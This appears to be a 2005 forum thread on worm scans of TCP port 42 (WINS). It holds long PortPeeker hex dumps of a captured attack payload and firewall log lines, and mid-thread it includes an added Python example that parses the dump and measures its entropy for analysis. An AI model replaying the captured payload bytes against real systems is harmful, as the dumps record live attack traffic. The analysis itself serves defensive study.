0310 49 93 3F 99 9E 46 92 90 41 FD 4A 95 43 96 45 F8 I.?..F..A.J.C.E.
0320 2F F9 4E F8 F8 37 F9 90 4A FC 41 90 48 4F FC 45 /.N..7..J.A.HO.E
0330 98 45 45 97 95 FC 43 4A 99 F5 27 93 46 4E 2F 9F .EE...CJ..'.FN/.
0340 92 46 FD 91 40 37 4E 49 47 4F 27 96 F8 4D 91 95 .F..@7NIGO'..M..
0350 40 41 4A 4A 97 92 4B 41 95 FD 9F 27 96 F5 FC 40 @AJJ..KA...'...@
0360 FD 91 99 47 42 49 48 95 45 48 9E 99 4D FC FC 2F ...GBIH.EH..M../
0370 27 46 90 4A 45 4F 49 97 4B 4B 48 45 FC 95 91 FC 'F.JEOI.KKHE....
0380 93 9E 9E 40 49 42 9F 42 42 91 2F 99 47 45 92 95 ...@IB.BB./.GE..
0390 FC 95 46 FD 90 47 93 9F F9 42 F9 37 4E 4E 40 9E ..F..G...B.7NN@.
03A0 42 9F 41 90 2F 49 99 95 4F 3F 4D 3F 93 95 95 4A B.A./I..O?M?...J
03B0 27 95 93 2F 90 49 42 4D 9F 37 FC 4D 93 37 96 F5 '../.IBM.7.M.7..
03C0 43 4A 2F FC 40 2F 3F FC 91 98 9E 47 4F 27 43 41 CJ/.@/?....GO'CA
03D0 4E F5 92 27 97 FC 2F 48 9F 90 45 F8 4F 92 98 43 N..'../H..E.O..C
03E0 41 99 92 99 46 9F 27 27 27 46 9E 98 9F 96 F5 48 A...F.'''F.....H
03F0 2F 4F 43 99 F9 9F 93 45 FC 3F 92 41 3F 4A F5 99 /OC....E.?.A?J..
0400 9E 46 4A 4E 93 4D F8 92 FC 43 3F 27 9F 9E 46 4A .FJN.M...C?'..FJ
0410 4B 41 98 45 4E F9 4A 4E 41 2F 49 46 FD F8 F8 48 KA.EN.JNA/IF...H
0420 91 F8 FC 46 2F 47 41 45 FD 40 F8 37 FD 4F 99 2F ...F/GAE.@.7.O./
0430 4A 92 F8 27 92 4E 2F 27 F5 96 48 4E 47 3F 4E 93 J..'.N/'..HNG?N.
0440 97 41 4F 96 93 F5 F9 96 F9 F8 40 9F 92 FC 45 95 .AO.......@...E.
0450 99 93 9E 4B 99 3F 90 95 FC 96 4D 2F 37 92 4E 9F ...K.?....M/7.N.
0460 99 41 47 95 F9 41 F8 42 37 9E FC FD 4A 96 F5 42 .AG..A.B7...J..B
0470 4D 91 4A 37 F9 45 90 99 41 93 48 42 46 46 4A 99 M.J7.E..A.HBFFJ.
0480 9F 40 4B 49 95 9F 95 F5 4E 90 98 4F 49 F9 9E 40 .@KI....N..OI..@
0490 F8 43 4B 37 9E 47 4E 48 37 97 43 FC 48 93 97 FD .CK7.GNH7.C.H...
04A0 FC F8 95 4E 93 90 FC 46 37 2F 42 48 48 4E 40 43 ...N...F7/BHHN@C
04B0 97 3F FC 42 4A 43 F9 FC 49 98 3F 40 46 46 3F 40 .?.BJC..I.?@FF?@
04C0 93 9E 96 4E F9 97 46 98 F5 9E 45 40 90 46 43 4A ...N..F...E@.FCJ
04D0 4F 48 92 3F 99 99 4A 40 93 43 96 42 49 4E 47 46 OH.?..J@.C.BINGF
04E0 47 98 98 3F 40 FC 2F 99 42 97 3F 4A F5 40 F5 49 G..?@./.B.?J.@.I
04F0 99 F5 F8 45 43 43 40 2F 49 47 9F 95 46 2F FD FD ...ECC@/IG..F/..
0500 40 4E 41 4D 4D FC 45 4A 9E 90 46 4F 92 99 F9 4D @NAMM.EJ..FO...M
0510 92 F9 90 92 46 2F 90 9E 47 43 F9 93 43 4F 27 96 ....F/..GC..CO'.
0520 40 F8 4B 37 4A F8 91 96 47 92 45 41 46 96 4A 99 @.K7J...G.EAF.J.
0530 47 4B 47 93 4D 95 3F 49 91 48 43 97 27 46 F8 42 GKG.M.?I.HC.'F.B
0540 42 FC 37 96 92 99 40 4E 9E 46 FD 43 93 42 4B F5 B.7...@N.F.C.BK.
0550 4F 97 4E 98 46 4A 27 9F 2F FD 96 41 95 FD 43 98 O.N.FJ'./..A..C.
0560 43 9E 99 47 4D F8 FC 4E 91 98 3F 93 3F 47 3F F5 C..GM..N..?.?G?.
0570 99 F8 46 48 4D 46 FC F8 4B 90 4D 4E 9F 93 37 2F ..FHMF..K.MN..7/
0580 FC 37 96 48 97 9F 45 97 FD F8 92 27 98 92 F9 43 .7.H..E....'...C
0590 93 49 2F FD 41 92 41 93 4B 45 F5 37 99 95 27 49 .I/.A.A.KE.7..'I
05A0 4D 3F 41 92 93 46 49 43 2F 95 99 43 FD 99 47 41 M?A..FIC/..C..GA
05B0 47 F8 FC 4D G..M

---- Echoed Data

68.144.235.53 : 3365 TCP Data In Length 1460 bytes
MD5 = 0AEAF79F17C8E790F8A642B1466A2364
---- 03/01/2005 16:35:44.275
0000 F5 93 4D 95 F5 47 90 2F F9 27 47 F9 41 96 4A 90 ..M..G./.'G.A.J.
0010 95 FD 2F 49 F9 97 FD 98 92 F9 2F 47 F9 FC 4E 41 ../I....../G..NA
0020 F9 98 43 43 3F 4D 4A 3F 4A 37 9F 46 92 95 2F 46 ..CC?MJ?J7.F../F
0030 2F 95 98 97 F8 4F FD 4F 99 40 FD FC 4E 45 95 3F /....O.O.@..NE.?
0040 3F 4D 46 93 42 4B 49 9F F5 49 37 9E 37 90 4B 27 ?MF.BKI..I7.7.K'
0050 3F F8 48 99 F8 90 98 45 90 96 92 48 93 4B 45 42 ?.H....E...H.KEB
0060 4B F9 93 F5 49 98 43 99 46 27 46 F8 2F 91 4D 4D K...I.C.F'F./.MM
0070 F5 4F 90 48 45 92 4B 4F 99 41 F8 46 48 43 92 FC .O.HE.KO.A.FHC..
0080 95 49 27 4D 48 99 FC 4D 40 43 42 40 45 43 FD 96 .I'MH..M@CB@EC..
0090 91 F5 F8 F8 48 92 F9 49 27 4D 92 FC 43 92 41 37 ....H..I'M..C.A7
00A0 FD 4F 46 F5 96 42 F9 48 4B 92 3F 4D 27 43 4F 3F .OF..B.HK.?M'CO?
00B0 3F 4F 92 45 FD 48 42 96 90 45 9F 4B 4E 92 41 F8 ?O.E.HB..E.KN.A.
00C0 93 93 46 96 96 92 4A 37 49 4E 4A 40 48 FD 93 96 ..F...J7INJ@H...
00D0 41 4F 4F 2F 43 9F 96 F5 41 92 49 FD 4D 45 43 90 AOO/C...A.I.MEC.
00E0 96 4A FC 92 48 90 97 43 F5 49 92 95 F8 2F 99 47 .J..H..C.I.../.G
00F0 4B 4B 4D 37 47 41 3F 4E F5 46 4A 2F 96 92 F9 46 KKM7GA?N.FJ/...F
0100 37 93 45 47 2F 46 4F 2F 41 47 46 92 F9 49 90 41 7.EG/FO/AGF..I.A
0110 91 98 F5 37 F5 41 40 97 46 4B F8 49 45 45 90 27 ...7.A@.FK.IEE.'
0120 FC 96 FC 99 FC 4F 93 4E 90 91 95 4A 91 9E F9 F8 .....O.N...J....
0130 27 97 F5 4E F5 9F 2F 96 F8 46 48 49 3F 93 95 4E '..N../..FHI?..N
0140 4E F5 99 27 FC 90 49 99 99 92 FD 9F 99 43 41 92 N..'..I......CA.
0150 F9 49 4B 97 2F FD 4F 98 4A 41 4B FC 27 F9 4D 2F .IK./.O.JAK.'.M/
0160 3F 37 FC 98 41 47 91 97 9E F5 47 9F 41 40 90 49 ?7..AG....G.A@.I
0170 F9 40 27 4E 93 91 42 42 2F 90 45 FC 90 48 49 93 .@'N..BB/.E..HI.
0180 46 95 27 95 41 37 27 93 4E 2F 47 45 4A 90 98 37 F.'.A7'.N/GEJ..7
0190 F9 27 48 42 45 42 4E 93 98 9F 27 3F 40 45 4B 97 .'HBEBN...'?@EK.
01A0 4A 45 4F 97 4B 4A 4B 4A 42 9F 4B 27 92 43 4E 4D JEO.KJKJB.K'.CNM
01B0 37 98 91 41 4A 46 4A 95 4A 95 40 FC F8 42 90 42 7..AJFJ.J.@..B.B
01C0 43 47 43 45 93 45 4F 46 37 4F 99 FC 98 F9 3F 4E CGCE.EOF7O....?N
01D0 49 4B F8 27 FD 90 2F 4F 41 4F 4A 3F 9F 98 99 95 IK.'../OAOJ?....
01E0 45 27 37 99 48 27 43 F9 98 9F 97 9F 98 F8 90 93 E'7.H'C.........
01F0 4B 4D FD 9F 43 90 3F 4E 97 93 45 9F 46 45 92 92 KM..C.?N..E.FE..
0200 99 F8 4E F9 95 92 43 49 48 FD 4E 95 91 40 43 4B ..N...CIH.N..@CK
0210 46 4D 91 F5 98 48 4D 99 91 43 41 4A 98 49 4B F8 FM...HM..CAJ.IK.
0220 27 3F 91 41 9F 48 90 4A 93 40 FC 93 98 99 45 F9 '?.A.H.J.@....E.
0230 43 92 F9 F5 3F 91 FD 46 4E 91 3F 27 47 47 F8 47 C...?..FN.?'GG.G
0240 F5 4A 97 95 F9 4D 96 96 99 48 49 FC F5 F8 9E 98 .J...M...HI.....
0250 90 49 41 49 27 95 F5 42 96 27 42 42 F8 95 95 45 .IAI'..B.'BB...E
0260 F5 95 91 4F 4B 97 92 F9 9E 42 41 47 43 3F F5 4B ...OK....BAGC?.K
0270 92 F9 F5 42 40 F8 3F 41 45 96 97 42 9E 3F 43 2F ...B@.?AE..B.?C/
0280 37 9F 46 40 F5 41 92 37 3F 95 92 42 98 92 98 3F 7.F@.A.7?..B...?
0290 48 48 F5 4F 45 43 FC 3F 45 4D FC F9 97 F5 43 F5 HH.OEC.?EM....C.
02A0 2F 41 FD 95 F8 F5 99 48 91 F8 4F 9E F9 48 F9 97 /A.....H..O..H..
02B0 91 F9 96 F9 4F 46 90 98 4B 95 4E 40 93 F8 97 27 ....OF..K.N@...'
02C0 F5 4E F9 45 41 47 4A 90 2F 95 92 3F F5 40 91 93 .N.EAGJ./..?.@..
02D0 4B FC 4F 40 98 F5 48 47 90 43 97 F8 46 47 4A 43 K.O@..HG.C..FGJC
02E0 9F 4D 42 43 F8 4D 4D 48 43 FD 97 F8 4F 9E FD 96 .MBC.MMHC...O...
02F0 99 46 F9 4F 9E 43 46 4F 96 4B 48 42 4E 4A 42 4A .F.O.CFO.KHBNJBJ
0300 F9 98 9E 41 27 9F 91 4A 4F F9 40 97 48 4B 46 42 ...A'..JO.@.HKFB
0310 93 48 92 90 49 2F FD 9E 4D 9E 37 4E 27 F5 4D 9E .H..I/..M.7N'.M.
0320 FD 4E 45 43 4F 90 F9 9E 97 49 9E 40 48 37 47 9F .NECO....I.@H7G.
0330 49 FD 4E 41 93 42 F8 96 90 41 9F 98 9E F9 FD 4F I.NA.B...A.....O
0340 27 42 4A F5 3F 4B 98 97 9F 46 46 42 4B 4D 9F 95 'BJ.?K...FFBKM..
0350 4F 3F 97 97 F8 9F 42 98 93 40 97 2F 4D 49 FC F8 O?....B..@./MI..
0360 92 4B 4F 45 27 FD 43 47 95 F5 99 40 97 42 3F 96 .KOE'.CG...@.B?.
0370 4A F8 41 37 48 9F 4D 48 43 F9 93 41 FD 2F 46 47 J.A7H.MHC..A./FG
0380 41 9F 98 F8 3F F8 4D 90 42 4A FC 99 F8 4A F8 42 A...?.M.BJ...J.B
0390 9F 47 FD FD 97 F8 4E 48 93 4D 46 92 F8 45 4A 45 .G....NH.MF..EJE
03A0 FD 40 98 4F F9 9F 4B 41 46 98 2F 90 99 9E F9 40 .@.O..KAF./....@
03B0 93 F8 91 2F 3F FD 4D FD 40 FC 3F 90 41 98 F5 41 .../?.M.@.?.A..A
03C0 45 3F 46 3F 43 49 46 46 41 FC 48 3F 4D F8 97 9E E?F?CIFFA.H?M...
03D0 4F 41 FC FD 90 9E 95 91 9E 4D 46 93 96 F5 4B 97 OA.......MF...K.
03E0 9F 27 4E FD 27 F8 4E 4A 90 4B 95 3F 4B 49 45 4D .'N.'.NJ.K.?KIEM
03F0 9F 91 9F 46 48 96 4A 95 2F 96 90 4E 4D 9F 90 FD ...FH.J./..NM...
0400 99 96 93 91 27 F8 9F 4E 97 2F 37 3F 91 92 98 97 ....'..N./7?....
0410 40 47 4A 96 4B 96 48 F5 40 43 90 F9 F8 98 93 92 @GJ.K.H.@C......
0420 98 27 48 FC 4B 43 F9 40 48 37 37 93 46 98 F8 95 .'H.KC.@H77.F...
0430 98 98 91 2F 49 9F 2F 40 4E 41 9E 47 3F 47 FC 41 .../I./@NA.G?G.A
0440 46 48 27 27 46 90 9E 27 F5 48 99 91 27 40 4D 4B FH''F..'.H..'@MK
0450 97 4E F8 F5 90 99 F9 F8 9E 27 40 FC 90 99 9E 4F .N.......'@....O
0460 48 2F 40 FC 47 4E 3F 3F 47 91 97 42 93 9F 90 40 H/@.GN??G..B...@
0470 F5 45 92 FC 97 98 91 4A 41 93 48 FC 4D 4A 9F 4F .E.....JA.H.MJ.O
0480 43 46 4B 90 46 96 4D 98 37 F5 99 95 37 45 9F 4F CFK.F.M.7...7E.O
0490 FD 97 2F 9F 93 45 46 41 F8 49 93 48 4B 41 96 9E ../..EFA.I.HKA..
04A0 F9 93 F8 4B 48 99 4B 3F 96 96 F9 99 90 3F FC F5 ...KH.K?.....?..
04B0 99 2F 92 99 45 4A 48 46 4B FC 49 4E 46 97 3F 4A ./..EJHFK.INF.?J
04C0 93 4F 96 4A F8 45 4D 93 F5 96 F9 43 37 37 97 4A .O.J.EM....C77.J
04D0 95 43 4D F8 41 27 4B 2F F9 49 46 98 41 43 F8 91 .CM.A'K/.IF.AC..
04E0 96 47 47 42 46 2F 37 92 2F 98 4B 3F 91 41 40 37 .GGBF/7./.K?.A@7
04F0 37 91 91 48 42 4F 3F 93 FD F5 49 90 97 F9 92 27 7..HBO?...I....'
0500 4E 2F FD 99 46 F5 41 FD 98 37 9E 4B 3F 9E 49 37 N/..F.A..7.K?.I7
0510 43 4F 90 41 40 41 47 98 99 49 41 4D 96 99 97 F5 CO.A@AG..IAM....
0520 95 27 45 F5 90 4D 46 42 37 46 41 4E 95 93 47 F8 .'E..MFB7FAN..G.
0530 4F 98 47 41 99 4B 48 40 3F 43 F8 27 45 92 92 F5 O.GA.KH@?C.'E...
0540 47 49 4F 40 2F 93 40 90 37 27 4A 4E FD F9 99 F9 GIO@/.@.7'JN....
0550 9F 2F 91 2F FC 95 48 27 92 4A 95 F8 48 91 F5 4A ././..H'.J..H..J
0560 FC 90 9F 48 4E 2F 3F 27 97 97 4D 92 99 92 FD 9E ...HN/?'..M.....
0570 96 45 47 4A 27 40 98 46 93 45 41 F5 90 FD 2F FC .EGJ'@.F.EA.../.
0580 45 F8 4F 9F 45 90 27 F5 47 47 F9 90 4F 4B 41 42 E.O.E.'.GG..OKAB
0590 47 98 48 95 9E 4D F5 95 96 48 40 F8 93 4F 93 2F G.H..M...H@..O./
05A0 43 F8 3F F5 3F 97 FC 90 41 98 41 42 93 FD 4A 99 C.?.?...A.AB..J.
05B0 97 45 93 98 .E..

---- Echoed Data
10035: [10035] Operation would block

68.144.235.53 : 3365 TCP Data In Length 1460 bytes
MD5 = 247B7E6F794ED3FDFB354D11FDAD381F
---- 03/01/2005 16:35:44.325
0000 49 F5 F8 FC 48 47 42 4F 99 9F F8 2F 91 2F 99 4A I...HGBO..././.J
0010 41 4E 27 4A 4F 90 F9 41 90 FC 96 91 91 47 27 49 AN'JO..A.....G'I
0020 93 91 4F 91 FD 46 3F 27 2F 45 4F 3F 92 4D 41 FD ..O..F?'/EO?.MA.
0030 49 F8 96 96 99 37 4E 4A 46 47 97 43 91 93 96 9E I....7NJFG.C....
0040 27 3F F5 4E FC 9E F9 93 9E 37 4A 40 91 9F 47 4D '?.N.....7J@..GM
0050 9E 49 48 4E 41 4D 92 95 FD 47 4A 4F 42 43 93 4F .IHNAM...GJOBC.O
0060 4E F8 FC 3F 9F 9F 2F 3F 9F 96 96 41 97 96 90 43 N..?../?...A...C
0070 49 91 9F 37 92 49 4A 4A 46 96 41 FC 93 47 97 FC I..7.IJJF.A..G..
0080 43 9E 3F 9F 99 F8 98 27 97 37 2F 37 FD 4B F8 98 C.?....'.7/7.K..
0090 49 46 FD 92 4A 9E F9 9E 92 95 49 93 9E F9 4B 49 IF..J.....I...KI
00A0 40 4A 2F 4F 27 92 49 46 F9 3F 2F 4A 4F 4E F8 40 @J/O'.IF.?/JON.@
00B0 91 43 98 9F 46 F9 27 97 96 95 40 9F 97 98 9E 98 .C..F.'...@.....
00C0 48 48 96 99 9E 93 43 47 99 F9 4F 96 93 40 9E 93 HH....CG..O..@..
00D0 43 42 90 97 45 98 3F 9E 91 27 F8 41 37 92 96 F5 CB..E.?..'.A7...
00E0 4A 95 9F F8 F5 4F 4D 9E 49 9E F9 41 45 4F 95 49 J....OM.I..AEO.I
00F0 9E 3F 37 92 45 46 4F 48 FC 4D 3F 49 97 F9 97 99 .?7.EFOH.M?I....
0100 9E 41 41 45 95 F9 4E FD 92 4D 95 37 98 48 F9 46 .AAE..N..M.7.H.F
0110 3F F9 F5 9E 96 27 F9 2F 95 F5 46 3F 42 9E FC 49 ?....'./..F?B..I
0120 9F 46 43 48 97 92 47 4E 96 91 FC 90 4F 42 FD 2F .FCH..GN....OB./
0130 98 41 45 90 96 98 92 47 4F FD 96 37 92 48 93 F5 .AE....GO..7.H..
0140 4F FC 91 41 45 4E 4A F8 40 97 4A FC 9F FD 41 4E O..AENJ.@.J...AN
0150 40 41 92 40 92 90 F9 46 FC 96 97 3F 42 41 97 93 @A.@...F...?BA..
0160 95 FC 93 46 49 41 47 48 95 95 4F 98 43 99 98 42 ...FIAGH..O.C..B
0170 2F 92 47 90 42 98 93 F8 FD 48 FD 4E 37 41 45 47 /.G.B....H.N7AEG
0180 42 95 4A 4B 41 90 3F 4D 4D 3F 48 41 9F 43 4D F5 B.JKA.?MM?HA.CM.
0190 4B F5 92 2F 3F 96 49 F9 FC 4B 3F FD 27 F8 4A 2F K../?.I..K?.'.J/
01A0 FD 90 99 9F 95 96 FD 4A 92 FD 99 97 4A F5 98 92 .......J....J...
01B0 46 4B 42 96 46 93 37 3F 93 93 F9 F8 40 91 91 F5 FKB.F.7?....@...
01C0 48 4B 4A 95 2F F8 4A 95 93 27 95 4B FD 92 99 3F HKJ./.J..'.K...?
01D0 9E 92 98 46 4A 46 43 42 45 96 93 27 4B 99 45 42 ...FJFCBE..'K.EB
01E0 41 FD 93 F5 92 97 42 49 45 2F F9 27 47 90 9F 3F A.....BIE/.'G..?
01F0 98 40 98 FC 4A 92 F5 FC 43 48 4B 4E 3F 91 47 96 .@..J...CHKN?.G.
0200 4D 4F 96 9F 4F 48 4D 27 97 9F 91 91 FC 2F 27 91 MO..OHM'...../'.
0210 98 9F 2F 4A 93 98 27 48 41 4A 46 90 93 40 37 42 ../J..'HAJF..@7B
0220 95 3F 9F FC 4D 42 92 F5 92 41 99 2F 9F 41 37 97 .?..MB...A./.A7.
0230 4D 3F 41 48 4A 92 97 43 96 95 48 4E 4B 98 F5 91 M?AHJ..C..HNK...
0240 90 45 91 48 9E 4D 90 9F 4D 45 4F 9E 49 4B 40 45 .E.H.M..MEO.IK@E
0250 43 FD 41 90 9E FC 41 37 45 3F 98 48 49 99 4A 4D C.A...A7E?.HI.JM
0260 47 47 41 FD 9F 9F 46 98 93 99 91 47 4F 4B 95 2F GGA...F....GOK./
0270 4A 4B 91 40 49 9E 90 46 43 47 48 40 90 F9 96 96 JK.@I..FCGH@....
0280 2F 43 47 FD 45 4E 43 91 4A 49 98 47 41 40 FC 45 /CG.ENC.JI.GA@.E
0290 9E 47 46 41 42 42 4D F9 37 99 4D F5 45 4E 4F 9F .GFABBM.7.M.ENO.
02A0 2F 95 99 F9 F9 27 F5 41 9E F5 4E 2F FC 4F 42 4D /....'.A..N/.OBM
02B0 4B 4A 92 4E 90 95 3F F5 4B 96 49 9E 47 FC 4A 2F KJ.N..?.K.I.G.J/
02C0 92 37 95 91 93 37 9E 92 49 99 41 98 91 46 46 4F .7...7..I.A..FFO
02D0 27 F5 27 9F 49 4D 97 37 98 F8 27 FC 98 F8 45 2F '.'.IM.7..'...E/
02E0 45 97 47 98 42 4B 3F F8 F5 95 41 4F 27 FD 4F 4B E.G.BK?...AO'.OK
02F0 99 97 4A 97 27 37 F5 F5 F8 4E 93 9E 40 9F 47 4F ..J.'7...N..@.GO
0300 99 49 FC 4D 37 42 9F 41 46 F9 45 4E 3F 27 9F 95 .I.M7B.AF.EN?'..
0310 FC 45 91 95 45 F9 9E FC 49 FD 4F 4E 27 43 9F 42 .E..E...I.ON'C.B
0320 FD 9E 4A F9 37 95 90 40 91 FD 4B FD 42 4F FC 9E ..J.7..@..K.BO..
0330 2F 37 4A 9F 49 47 37 46 4A 97 93 95 45 FD 93 9E /7J.IG7FJ...E...
0340 9F 3F F5 95 FD 97 46 96 98 F5 47 9E 95 91 92 F9 .?....F...G.....
0350 99 FD 46 91 4F F8 9F 91 4B 9F 27 96 4B FD 4A 90 ..F.O...K.'.K.J.
0360 2F 46 49 46 4E 92 4D 40 FD 4B 48 93 43 9E 9F 43 /FIFN.M@.KH.C..C
0370 98 40 47 92 90 93 48 27 27 4D F8 42 48 37 92 96 .@G...H''M.BH7..
0380 98 4E 4E 95 4A 95 41 90 4D 4F 46 96 F9 F9 2F 93 .NN.J.A.MOF.../.
0390 9F F9 2F F5 48 FD 42 45 9F F9 F8 47 49 9E 4B 92 ../.H.BE...GI.K.
03A0 97 96 2F 40 F8 F9 FC 48 96 3F 3F FC 4A 4E 93 2F ../@...H.??.JN./
03B0 9F 9E 4F 47 F5 41 99 27 97 FD 47 FD F9 91 2F 95 ..OG.A.'..G.../.
03C0 3F 48 FC 43 97 96 99 96 FC FD 4D 4D 93 F5 90 46 ?H.C......MM...F
03D0 3F 43 4A 41 4E 98 F8 40 2F 43 F5 4F F9 95 4D FD ?CJAN..@/C.O..M.
03E0 43 F5 FC 4B 46 37 F5 4D 2F 9F 97 2F 43 F8 98 4D C..KF7.M/../C..M
03F0 FC 3F 46 FC F8 42 46 9F 48 42 92 FC 4F 4D 45 48 .?F..BF.HB..OMEH
0400 37 92 27 9E 47 FC 96 97 91 91 F8 F5 47 97 3F 48 7.'.G.......G.?H
0410 95 46 F5 4F 42 95 4E F9 91 37 47 47 43 43 F9 4B .F.OB.N..7GGCC.K
0420 9E 93 48 49 98 93 90 95 F5 97 40 27 91 9E 3F 49 ..HI......@'..?I
0430 FD F8 F9 9E 42 98 40 41 96 4F 9E 4F 99 40 41 41 ....B.@A.O.O.@AA
0440 40 FD F9 93 3F 4D 91 43 41 47 4A 42 FD F8 42 F9 @...?M.CAGJB..B.
0450 F9 FD 95 95 4F 95 46 43 91 49 96 37 47 4A 3F 46 ....O.FC.I.7GJ?F
0460 4F 4D 97 43 4F 43 95 9F 37 F9 9F 4E 4F 41 2F 37 OM.COC..7..NOA/7
0470 42 37 99 4B 41 43 37 3F 43 93 FC FC 4D 95 45 37 B7.KAC7?C...M.E7
0480 3F 92 3F 93 42 99 FD 96 3F 9E 4A 27 9F 41 4E 40 ?.?.B...?.J'.AN@
0490 99 48 92 F8 93 9E 27 37 4B 97 4B 37 92 93 27 40 .H....'7K.K7..'@
04A0 46 48 4F 42 27 99 4B 40 F9 96 41 F5 4E 41 97 9E FHOB'.K@..A.NA..
04B0 91 98 45 90 46 9E 99 91 49 4A 46 9F 2F 49 F9 41 ..E.F...IJF./I.A
04C0 93 9F 4F 46 42 3F FC 40 F8 F9 F5 2F 4E 99 91 FD ..OFB?.@.../N...
04D0 FC 3F 27 F5 9F 45 45 45 46 47 F9 4E 99 40 F8 47 .?'..EEEFG.N.@.G
04E0 91 4A 46 41 F9 47 43 2F 95 3F 4A 99 FC 42 92 90 .JFA.GC/.?J..B..
04F0 9E 4D 95 99 4F 37 47 3F 4F FD 4B 95 99 48 37 99 .M..O7G?O.K..H7.
0500 45 46 48 9E FC 3F 2F 90 99 47 92 FD 93 2F 46 9E EFH..?/..G.../F.
0510 41 4D 9E 40 93 9E 4D 49 48 4F 97 4A 4D 96 43 FD AM.@..MIHO.JM.C.
0520 9F F9 40 FD 37 42 4D 4F 9F 95 F9 37 41 F9 43 4F ..@.7BMO...7A.CO
0530 2F 42 4E 37 99 41 4D 91 F8 48 3F 91 90 47 98 F8 /BN7.AM..H?..G..
0540 F8 96 9E 4B 4A FC F5 F8 F9 F5 F8 91 47 43 96 41 ...KJ.......GC.A
0550 92 9E 42 4B 4D 95 27 90 99 4D 49 9E 43 F8 95 47 ..BKM.'..MI.C..G
0560 4F 4A 42 4D 4F 4B 45 F8 9E 99 90 41 98 4B FC 4B OJBMOKE....A.K.K
0570 90 48 48 42 9F 27 F5 4B 4F 40 F9 45 37 96 97 F5 .HHB.'.KO@.E7...
0580 98 4D 93 4F 97 42 49 3F 47 92 43 93 27 9E 47 40 .M.O.BI?G.C.'.G@
0590 FC 90 49 42 95 90 45 27 2F 93 47 99 91 FD 96 96 ..IB..E'/.G.....
05A0 F9 F8 95 45 48 FD 47 90 93 46 F9 FD 92 90 47 92 ...EH.G..F....G.
05B0 F9 4E 96 4E .N.N

---- Echoed Data
10054: [10054] Connection reset by peer

TCP Error
---- 03/01/2005 16:35:44.375
Error Code: 10054 Winsock error in recv()

TCP Error
---- 03/01/2005 16:35:44.375
Error Code: 10054 Winsock error in recv()

TCP Error
---- 03/01/2005 16:35:44.385
Error Code: 10054 Winsock error in recv()

TCP Error
---- 03/01/2005 16:35:44.395
Error Code: 10054 Winsock error in recv()

68.144.235.53 : 3365 TCP Disconnected ID = 1
---- 03/01/2005 16:35:44.395
Status Code: 10053 [10053] Software caused connection abort

---------------

Blake
Link Logger (MVM) to CrookedSmile
Note 68.144.235.53 attack on TCP Port 42:

Jan 03, 2005 16:26:39.238 - (TCP) 68.144.235.53 : 3365 >>> 192.168.1.35 : 42 (scanned 68.144.238.148 but was forwarded through to 192.168.1.35 which is running PortPeeker)

was also logged on

Jan 03, 2005 16:26:01.828 - (TCP) 68.144.235.53 : 3163 >>> 68.144.238.64 : 42
Jan 03, 2005 16:25:58.828 - (TCP) 68.144.235.53 : 3163 >>> 68.144.238.64 : 42

So it is doing block scans (2.2 IP Addresses per second??).

NOTE I also captured a second capture from a return attack which was very much different (also much much larger) and can be viewed at »www.linklogger.com/TCP42WINS.htm

I suspect the capture above was truncated by a network error as I was feeding him back his data, but the bits are different so it makes me wonder if the attack is polymorphic (i.e. encrypted or packed differently each time).

Blake
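The hex dump above is in PortPeeker's row layout (offset, up to 16 hex bytes, ASCII column), and the question raised about it is whether two captures of the same worm differ because the payload is packed or encrypted. The following is an added example, not code from the thread or from PortPeeker: it parses a dump of that layout back into bytes and reports the figures an analyst would compare between captures (size, entropy, byte alphabet, printable share). The sample dump embedded in it is constructed for the example and is not the captured payload; paste the thread's own rows into `parse_hexdump` to run it on the real capture.

```python
import math
import re
from collections import Counter

# Constructed sample in the PortPeeker layout used in the thread:
# a 4-digit hex offset, up to 16 hex byte values, then an ASCII column.
# These are NOT the bytes of the captured payload.
SAMPLE_DUMP = """\
0000 41 41 41 41 42 42 42 42 43 43 43 43 44 44 44 44 AAAABBBBCCCCDDDD
0010 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ................
0020 DE AD BE EF ....
"""

# One dump row: an offset, then hex pairs each followed by whitespace.
DUMP_LINE = re.compile(r"^\s*([0-9A-Fa-f]{4,8})\s+((?:[0-9A-Fa-f]{2}\s)+)")


def parse_hexdump(text: str) -> bytes:
    """Rebuild raw bytes from a PortPeeker-style hex dump.

    Lines that are not dump rows (the 'Echoed Data' and 'TCP Error' blocks,
    blank lines) are skipped. Offsets must be contiguous relative to the
    first row, so a truncated or re-ordered paste raises instead of
    silently producing a wrong payload.
    """
    out = bytearray()
    base = None
    for line in text.splitlines():
        m = DUMP_LINE.match(line + " ")  # trailing space lets the last pair match
        if not m:
            continue
        offset = int(m.group(1), 16)
        if base is None:
            base = offset
        if offset - base != len(out):
            raise ValueError(f"dump not contiguous at {offset:#06x}: have {len(out)} bytes")
        # A full row carries 16 byte values; anything beyond that is the ASCII
        # column. On a short final row an ASCII column that itself starts with
        # a hex pair and a space would be misread; PortPeeker's '.' fillers
        # make that unlikely but it is worth knowing.
        pairs = m.group(2).split()[:16]
        out.extend(int(p, 16) for p in pairs)
    return bytes(out)


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, from 0.0 up to 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def summarize(data: bytes) -> dict:
    """Figures to compare across two captures of the same worm.

    Entropy near 8.0 with all 256 byte values present points to encryption or
    compression; a small alphabet over a long payload points to a restricted
    encoding instead, and a high printable share to plain text.
    """
    printable = sum(1 for b in data if 0x20 <= b < 0x7F)
    return {
        "length": len(data),
        "entropy": round(shannon_entropy(data), 3),
        "distinct_bytes": len(set(data)),
        "printable_ratio": round(printable / len(data), 3) if data else 0.0,
    }


if __name__ == "__main__":
    payload = parse_hexdump(SAMPLE_DUMP)
    print(summarize(payload))
```

Running `summarize` on each of the two captures side by side answers the polymorphism question more reliably than eyeballing the hex: identical size and alphabet with different bytes suggests a changing key or packer seed, while different sizes suggest the first capture really was cut short by the connection reset shown in the log.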
kpatz (MY HEAD A SPLODE, Premium Member, join:2003-06-13, Manchester, NH)
Oh lookee, my first scan on port 42!!
quote:
Jan 4 18:16:51 linux1 kernel: Packet log: input DENY eth0 PROTO=6 24.13.89.92:1265 (My IP):42 L=48 S=0x80 I=54706 F=0x4000 T=112 SYN (#28)
The IP resolves to c-24-13-89-92.client.comcast.net. This IP has never scanned me before.
